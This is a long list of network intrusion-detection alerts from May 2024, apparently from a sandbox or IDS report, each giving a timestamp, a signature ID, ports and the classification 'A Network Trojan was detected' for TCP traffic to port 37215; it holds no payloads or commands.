                Timestamp:05/29/24-15:16:10.420342
                SID:2835222
                Source Port:60856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074081
                SID:2829579
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960600
                SID:2829579
                Source Port:59944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281446
                SID:2829579
                Source Port:40070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716116
                SID:2829579
                Source Port:53914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035025
                SID:2829579
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210806
                SID:2829579
                Source Port:33678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614110
                SID:2835222
                Source Port:42220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914937
                SID:2829579
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873308
                SID:2835222
                Source Port:50310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869126
                SID:2835222
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737183
                SID:2835222
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706432
                SID:2829579
                Source Port:55786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359838
                SID:2829579
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816193
                SID:2829579
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979568
                SID:2829579
                Source Port:52860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166632
                SID:2835222
                Source Port:34270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897515
                SID:2835222
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681698
                SID:2829579
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583777
                SID:2829579
                Source Port:50124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665588
                SID:2835222
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739627
                SID:2835222
                Source Port:49420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228285
                SID:2835222
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926792
                SID:2829579
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.729970
                SID:2835222
                Source Port:45586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567385
                SID:2829579
                Source Port:53984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413729
                SID:2829579
                Source Port:53914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980122
                SID:2829579
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420941
                SID:2835222
                Source Port:38612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841807
                SID:2829579
                Source Port:58716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896344
                SID:2835222
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853935
                SID:2835222
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719971
                SID:2829579
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665609
                SID:2835222
                Source Port:59248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557393
                SID:2835222
                Source Port:56986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154478
                SID:2829579
                Source Port:53642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160238
                SID:2835222
                Source Port:47140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902155
                SID:2835222
                Source Port:52348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227042
                SID:2835222
                Source Port:50344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324665
                SID:2829579
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985718
                SID:2829579
                Source Port:48090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721656
                SID:2835222
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436375
                SID:2835222
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860421
                SID:2835222
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715005
                SID:2829579
                Source Port:39574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669171
                SID:2835222
                Source Port:58372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984883
                SID:2829579
                Source Port:47438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943866
                SID:2835222
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538379
                SID:2835222
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234121
                SID:2835222
                Source Port:35766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841612
                SID:2835222
                Source Port:59392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963210
                SID:2829579
                Source Port:34076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281864
                SID:2835222
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039655
                SID:2835222
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964665
                SID:2835222
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231529
                SID:2835222
                Source Port:35788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906838
                SID:2835222
                Source Port:46832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742622
                SID:2829579
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586217
                SID:2835222
                Source Port:40146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.870116
                SID:2829579
                Source Port:38330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873082
                SID:2835222
                Source Port:41488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586053
                SID:2829579
                Source Port:56100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684454
                SID:2829579
                Source Port:59756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986696
                SID:2835222
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787077
                SID:2835222
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664472
                SID:2835222
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378883
                SID:2835222
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853629
                SID:2829579
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901976
                SID:2829579
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240387
                SID:2835222
                Source Port:42660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557990
                SID:2835222
                Source Port:57930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706517
                SID:2829579
                Source Port:48902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988949
                SID:2829579
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902422
                SID:2829579
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571143
                SID:2829579
                Source Port:57726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893408
                SID:2829579
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821433
                SID:2835222
                Source Port:46544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856120
                SID:2835222
                Source Port:39852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209511
                SID:2835222
                Source Port:50516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928883
                SID:2829579
                Source Port:33308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919921
                SID:2835222
                Source Port:44794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336664
                SID:2835222
                Source Port:43890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883830
                SID:2835222
                Source Port:52972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910806
                SID:2829579
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706028
                SID:2835222
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369899
                SID:2835222
                Source Port:57246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572309
                SID:2829579
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963078
                SID:2835222
                Source Port:35042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037736
                SID:2835222
                Source Port:36980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501362
                SID:2835222
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617643
                SID:2829579
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686775
                SID:2835222
                Source Port:47342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571549
                SID:2829579
                Source Port:35298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318426
                SID:2835222
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739788
                SID:2835222
                Source Port:50220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277203
                SID:2835222
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287004
                SID:2835222
                Source Port:51524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242968
                SID:2835222
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712009
                SID:2829579
                Source Port:36464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786937
                SID:2829579
                Source Port:60912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645128
                SID:2829579
                Source Port:60940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675117
                SID:2835222
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660878
                SID:2829579
                Source Port:59536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266726
                SID:2829579
                Source Port:40950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132854
                SID:2835222
                Source Port:33512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714206
                SID:2829579
                Source Port:59182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332561
                SID:2835222
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433818
                SID:2835222
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890977
                SID:2829579
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266616
                SID:2835222
                Source Port:45388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845203
                SID:2829579
                Source Port:50860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088087
                SID:2829579
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141137
                SID:2829579
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617014
                SID:2835222
                Source Port:53748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284238
                SID:2835222
                Source Port:42972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.973762
                SID:2835222
                Source Port:56660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962227
                SID:2829579
                Source Port:60802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567224
                SID:2829579
                Source Port:58494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100578
                SID:2835222
                Source Port:42900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631535
                SID:2835222
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620328
                SID:2829579
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982150
                SID:2835222
                Source Port:35138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113825
                SID:2835222
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980236
                SID:2829579
                Source Port:33258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586945
                SID:2835222
                Source Port:33520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.159791
                SID:2829579
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821167
                SID:2835222
                Source Port:36542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873482
                SID:2835222
                Source Port:46718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284552
                SID:2835222
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782697
                SID:2835222
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436353
                SID:2835222
                Source Port:43322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071632
                SID:2835222
                Source Port:41284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816891
                SID:2835222
                Source Port:47730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820694
                SID:2835222
                Source Port:33682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279552
                SID:2835222
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422135
                SID:2829579
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575130
                SID:2829579
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985632
                SID:2829579
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860021
                SID:2835222
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332637
                SID:2835222
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559298
                SID:2829579
                Source Port:50528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703834
                SID:2835222
                Source Port:36272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281321
                SID:2835222
                Source Port:50954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507084
                SID:2835222
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212190
                SID:2829579
                Source Port:33480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110688
                SID:2835222
                Source Port:42550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909279
                SID:2829579
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845295
                SID:2829579
                Source Port:53560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985731
                SID:2835222
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885551
                SID:2835222
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160402
                SID:2835222
                Source Port:56314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101024
                SID:2829579
                Source Port:33946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948847
                SID:2835222
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363464
                SID:2835222
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224022
                SID:2829579
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766264
                SID:2835222
                Source Port:49828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173931
                SID:2829579
                Source Port:49624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074479
                SID:2829579
                Source Port:43780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913045
                SID:2835222
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474715
                SID:2829579
                Source Port:59378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763171
                SID:2835222
                Source Port:53656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008365
                SID:2829579
                Source Port:39614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508621
                SID:2829579
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015538
                SID:2835222
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617669
                SID:2835222
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517803
                SID:2829579
                Source Port:54110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440915
                SID:2835222
                Source Port:46700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385362
                SID:2829579
                Source Port:52708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452060
                SID:2829579
                Source Port:45676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240739
                SID:2829579
                Source Port:33694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901035
                SID:2835222
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022572
                SID:2835222
                Source Port:50330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807425
                SID:2829579
                Source Port:45096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987108
                SID:2829579
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655777
                SID:2829579
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931485
                SID:2835222
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664278
                SID:2835222
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821199
                SID:2835222
                Source Port:54318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164892
                SID:2829579
                Source Port:51334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209774
                SID:2835222
                Source Port:54098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532068
                SID:2829579
                Source Port:45274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287734
                SID:2829579
                Source Port:34386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607747
                SID:2835222
                Source Port:50654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071202
                SID:2829579
                Source Port:42662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567385
                SID:2835222
                Source Port:50472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261418
                SID:2829579
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873581
                SID:2829579
                Source Port:57842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139869
                SID:2829579
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363502
                SID:2829579
                Source Port:41938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526759
                SID:2835222
                Source Port:37214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813481
                SID:2829579
                Source Port:37706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845441
                SID:2829579
                Source Port:39380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992843
                SID:2835222
                Source Port:50604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127959
                SID:2835222
                Source Port:46792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785582
                SID:2835222
                Source Port:41688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573817
                SID:2829579
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613017
                SID:2835222
                Source Port:47346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561755
